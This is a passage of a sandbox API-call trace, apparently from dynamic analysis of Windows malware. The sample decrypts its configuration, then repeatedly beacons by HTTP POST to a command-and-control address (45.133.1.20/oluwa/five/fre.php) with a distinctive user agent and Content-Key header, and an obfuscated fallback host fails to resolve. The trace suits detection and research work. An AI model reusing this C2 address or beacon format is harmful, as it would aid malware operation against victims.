[0191.942] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.943] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.943] GetProcessHeap () returned 0x6a0000 [0191.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0191.943] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.943] GetProcessHeap () returned 0x6a0000 [0191.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0191.944] GetProcessHeap () returned 0x6a0000 [0191.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.944] GetProcessHeap () returned 0x6a0000 [0191.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0191.945] GetProcessHeap () returned 0x6a0000 [0191.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0191.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0191.962] GetProcessHeap () returned 0x6a0000 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.963] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0191.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.964] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.965] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.965] GetProcessHeap () returned 0x6a0000 [0191.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.968] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0191.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.969] CryptDestroyKey (hKey=0x6ad020) returned 1 [0191.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.970] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0191.970] GetProcessHeap () returned 0x6a0000 [0191.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.972] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0191.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.973] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0191.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.974] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0191.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.975] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0191.975] GetProcessHeap () returned 0x6a0000 [0191.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0191.975] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0191.975] GetProcessHeap () returned 0x6a0000 [0191.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0191.975] socket (af=2, type=1, protocol=6) returned 0x4a4 [0191.976] connect (s=0x4a4, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0192.003] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0192.003] GetProcessHeap () returned 0x6a0000 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0192.003] GetProcessHeap () returned 0x6a0000 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0192.003] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.049] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.049] GetProcessHeap () returned 0x6a0000 [0192.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0192.049] GetProcessHeap () returned 0x6a0000 [0192.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.050] GetProcessHeap () returned 0x6a0000 [0192.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0192.050] GetProcessHeap () returned 0x6a0000 [0192.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0192.051] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.052] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.052] GetProcessHeap () returned 0x6a0000 [0192.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0192.052] GetProcessHeap () returned 0x6a0000 [0192.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.052] send (s=0x4a4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0192.053] send (s=0x4a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0192.053] GetProcessHeap () returned 0x6a0000 [0192.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0192.053] recv (in: s=0x4a4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0192.152] GetProcessHeap () returned 0x6a0000 [0192.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0192.153] GetProcessHeap () returned 0x6a0000 [0192.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0192.154] GetProcessHeap () returned 0x6a0000 [0192.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0192.155] GetProcessHeap () returned 0x6a0000 [0192.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0192.155] closesocket (s=0x4a4) returned 0 [0192.156] GetProcessHeap () returned 0x6a0000 [0192.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0192.156] GetProcessHeap () returned 0x6a0000 [0192.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.156] GetProcessHeap () returned 0x6a0000 [0192.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0192.157] GetProcessHeap () returned 0x6a0000 [0192.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0192.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1268) returned 0x4a4 [0192.160] Sleep (dwMilliseconds=0xea60) [0192.161] GetProcessHeap () returned 0x6a0000 [0192.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0192.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.163] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0192.178] GetProcessHeap () returned 0x6a0000 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfcf8 [0192.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.179] CryptImportKey (in: hProv=0x6beb90, pbData=0x6bfcf8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0192.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.181] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.182] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.182] GetProcessHeap () returned 0x6a0000 [0192.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfcf8 | out: hHeap=0x6a0000) returned 1 [0192.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.184] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0192.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.185] CryptDestroyKey (hKey=0x6ad560) returned 1 [0192.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.186] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0192.187] GetProcessHeap () returned 0x6a0000 [0192.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.192] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.193] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.195] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.196] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.196] GetProcessHeap () returned 0x6a0000 [0192.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0192.196] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.196] GetProcessHeap () returned 0x6a0000 [0192.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0192.197] GetProcessHeap () returned 0x6a0000 [0192.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.197] GetProcessHeap () returned 0x6a0000 [0192.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0192.197] GetProcessHeap () returned 0x6a0000 [0192.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0192.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0192.214] GetProcessHeap () returned 0x6a0000 [0192.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0192.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.215] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0192.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.217] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.218] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.218] GetProcessHeap () returned 0x6a0000 [0192.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0192.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.219] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0192.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.220] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0192.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.221] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0192.221] GetProcessHeap () returned 0x6a0000 [0192.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.223] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0192.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.224] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0192.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.225] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0192.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.226] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0192.226] GetProcessHeap () returned 0x6a0000 [0192.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0192.226] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0192.226] GetProcessHeap () returned 0x6a0000 [0192.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0192.227] socket (af=2, type=1, protocol=6) returned 0x4a8 [0192.227] connect (s=0x4a8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0192.251] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0192.251] GetProcessHeap () returned 0x6a0000 [0192.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0192.251] GetProcessHeap () returned 0x6a0000 [0192.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0192.252] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.255] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.255] GetProcessHeap () returned 0x6a0000 [0192.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0192.256] GetProcessHeap () returned 0x6a0000 [0192.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.256] GetProcessHeap () returned 0x6a0000 [0192.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0192.256] GetProcessHeap () returned 0x6a0000 [0192.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0192.257] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.258] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.258] GetProcessHeap () returned 0x6a0000 [0192.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0192.258] GetProcessHeap () returned 0x6a0000 [0192.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.259] send (s=0x4a8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0192.259] send (s=0x4a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0192.259] GetProcessHeap () returned 0x6a0000 [0192.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0192.260] recv (in: s=0x4a8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0192.325] GetProcessHeap () returned 0x6a0000 [0192.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0192.326] GetProcessHeap () returned 0x6a0000 [0192.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0192.327] GetProcessHeap () returned 0x6a0000 [0192.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0192.328] GetProcessHeap () returned 0x6a0000 [0192.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0192.328] closesocket (s=0x4a8) returned 0 [0192.329] GetProcessHeap () returned 0x6a0000 [0192.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0192.329] GetProcessHeap () returned 0x6a0000 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.330] GetProcessHeap () returned 0x6a0000 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0192.330] GetProcessHeap () returned 0x6a0000 [0192.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0192.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x127c) returned 0x4a8 [0192.334] Sleep (dwMilliseconds=0xea60) [0192.336] GetProcessHeap () returned 0x6a0000 [0192.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0192.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.337] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0192.363] GetProcessHeap () returned 0x6a0000 [0192.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfba8 [0192.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.364] CryptImportKey (in: hProv=0x6bef48, pbData=0x6bfba8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0192.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.365] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.366] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.366] GetProcessHeap () returned 0x6a0000 [0192.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfba8 | out: hHeap=0x6a0000) returned 1 [0192.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.368] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0192.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.369] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0192.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.376] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0192.377] GetProcessHeap () returned 0x6a0000 [0192.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.378] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.381] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.382] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.382] GetProcessHeap () returned 0x6a0000 [0192.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0192.382] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, 